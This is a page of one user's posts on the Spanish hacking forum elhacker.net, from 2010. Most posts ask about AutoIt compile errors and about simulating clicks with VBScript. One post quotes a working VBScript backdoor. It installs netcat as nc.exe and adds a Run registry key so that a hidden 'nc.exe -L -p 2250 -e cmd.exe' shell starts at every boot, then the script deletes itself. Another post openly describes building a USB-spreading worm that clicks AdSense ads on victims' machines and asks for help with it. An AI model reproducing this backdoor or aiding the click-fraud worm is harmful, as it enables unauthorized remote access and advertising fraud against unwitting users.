elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 2 [3] 4
21  Programación / Scripting / Re: Error al compilar en AUTOIT Necesito Ayuda!!! en: 1 Febrero 2010, 02:32 am
Bueno, podria ser pero te comento que tambien realice la prueba en el escritorio y no me funcionó. De todas maneras que quede esto de aprendizaje para toda la comunidad. Muchas gracias Saludos....
22  Programación / Scripting / Re: Error al compilar en AUTOIT Necesito Ayuda!!! en: 1 Febrero 2010, 02:11 am
Ok resuelto el problema..... Muchas gracias a todos..
Les comento que el problema se presenta debido a que tenia que colocar el archivo .au3 dentro de la carpeta de AUTOIT que en mi caso es C:\Archivos de programa\AutoIt3\Aut2Exe y una vez colocado el archivo dentro lo que se debe hacer es darle click derecho y compilar.. resuelto el problema.. Saludos a todos...
23  Programación / Scripting / Re: Error al compilar en AUTOIT Necesito Ayuda!!! en: 31 Enero 2010, 20:53 pm
Lo tengo guardado en C:\ y me sigue dando el mismo error.  De verdad no se cual es el problema, yo lo probe y me funciono perfectamente pero dandole doble click al archivo que se llama mouse.au3 pero para que corra en cualquier maquina que no tenga instalado AUTOIT tengo que convertirlo a mouse.exe.
Tambien probe compilandolo o convirtiendolo desde el compilador. Donde dice Source File le doy browse y selecciono en c:\mouse.au3 y en Destination File coloco c:\mouse.exe y no me funciona pero si coloco c:\mouse.a3x si me funciona. Me podria alguien decir si el archivo compilado como mouse.a3x funcionaria en una pc que no tenga instalado el AUTOIT? Saludos
24  Programación / Scripting / Re: Error al compilar en AUTOIT Necesito Ayuda!!! en: 31 Enero 2010, 19:23 pm
Ok te explico, yo escribi el script en notepad ++ y lo guarde con extension .au3 luego una vez que se guarda me aparece el tipico icono debido a la extension que le coloque. Despues sobre el icono de mi archivo .au3 lo que hago es click derecho y le doy donde dice Compilar archivo y empieza a crearme el .exe pero me arroja ese error que dice Error opening the destination file
No se donde me estoy equivocando.........
25  Programación / Scripting / Error al compilar en AUTOIT Necesito Ayuda!!! en: 31 Enero 2010, 17:22 pm
Hola buenos dias a todos!!!
Tengo el siguiente problema: Estoy empezando a usar AUTOIT y probe con este script

MouseClick("right", 40, 51, 2)

el script funciona bien pero el problema es que cuando lo intento pasar a .exe me arroja un error que dice Error opening the destination file

Les agradecería enormemente quien me pueda dar una manito aqui. Saludos
26  Programación / Scripting / Script para auto CLICK en un vinculo determinado en: 26 Enero 2010, 01:06 am
Hola buenas noches, estoy en la busqueda de información para aprender a buscar (por decirlo de alguna manera) los parametros siguientes de un codigo, es decir, en el siguiente código estan ciertas estructuras que quisiera saber que otras opciones tengo, por ejemplo:

Este es un código para rellenar un formulario y enviarlo.

Set IE = Createobject("internetexplorer.application")
IE.visible = True
IE.navigate "http://www.google.com"
Do while IE.busy
wscript.sleep 200
Loop
IE.document.getelementbyid("q").value = "elhacker.net"
IE.document.getelementbyid("btnG").click


Fijense en lo que está coloreado en azul. Yo me pregunto si alguien sabe que otros parametros se pueden utilizar, por ejemplo arriba vemos 2 parametros asignados a IE que serian IE.Visible y el IE.Navigate ademas de estos 2 cuantos mas existen? alguien tiene un buen manual por alli?

Luego se puede observar más abajo otros parametros como lo son IE.document.getelementbyid("")
y este parámetro a su vez se le añaden otros parametros como lo son .value y.click.

Les agradeceria enormemente si alguien me puede ayudar con mi pregunta. Quisiera poder jugar con este código y no se que mas opciones tengo aparte de estos parametros, necesito una lista de ellos.

Saludos.........
27  Programación / Scripting / Re: Controlar el MOUSE con un archivo VisualBasic Script en: 25 Enero 2010, 01:27 am
Ok te explico, estoy trabajando en un pequeño proyecto que no se como llamarlo. No se si es un gusano o un virus. Haber te explico. Deseo hacer programa que se autocopie via USB que ya lo tengo practicamente listo pero me parece que es una via muy pero muy lenta para propagarse. Una vez que el programa se instale en la maquina victima lo que quiero que haga es ir a una pagina web en especial y posicionar el puntero del raton en determinada cordenada y hacer click. Esta zona en especial es un anuncio de Adsense. Estoy recopilando informacion para ver que otra tecnica de propagacion podria utilizar (Podria ser a través de MSN, FTP o TFTP) el problema con tftp es que necesito un servidor tftp ya que la ventaja de este metodo es que windows trae un cliente por defecto tftp al cual le puedo girar instrucciones por consola pero el problema se me presenta en el servidor. Por otra parte veo mas accesible utilizar el FTP ya que servidores gratis que presten ese servicio los hay por monton. Bueno pero volviendo al tema, estoy varado en la parte de hacer click en el anuncio Adsense.
Me podrias dar una mano sobre este problema y si se te ocurre un metodo de propagacion te lo agradeceria.
Saludos
28  Programación / Scripting / Re: Controlar el MOUSE con un archivo VisualBasic Script en: 25 Enero 2010, 01:11 am
Disculpa amigo, me podrias pasar un link que tu creas el mas adecuado para mi problema, ya que por lo que veo eres un gran conocedor de los temas aqui expuestos. Necesito informacion sobre ese script por favor. Disculpa tanta molestia. Saludos..
29  Programación / Scripting / Re: [Mi virus para entrar en otro ordenador][vbs]¿fallos? en: 25 Enero 2010, 00:46 am
Citar
On Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre



Disculpen muchachos, sera que me pueden decir donde obtengo informacion acerca de esta linea de programacion: correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide  parece que significa ejecutar el archivo de manera oculta pero quisiera entender el porque -L -p 2250? son comandos NetCat? -e? que es eso?

Saludos
30  Programación / Scripting / Re: Controlar el MOUSE con un archivo VisualBasic Script en: 25 Enero 2010, 00:10 am
Ok Novlucker, gracias por la información, de verdad la encuentro util y como dices tu: El que no tenga Office no le funciona. Haber respondeme esta pregunta por favor: Que hay de hacer click? el click se puede simular o algo parecido? por ejemplo, quiero mover el puntero a todo el centro de la pantalla y hacer click. Es posible eso? hacer click sin darle fisicamente al boton del mouse?
Saludos hermano......
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines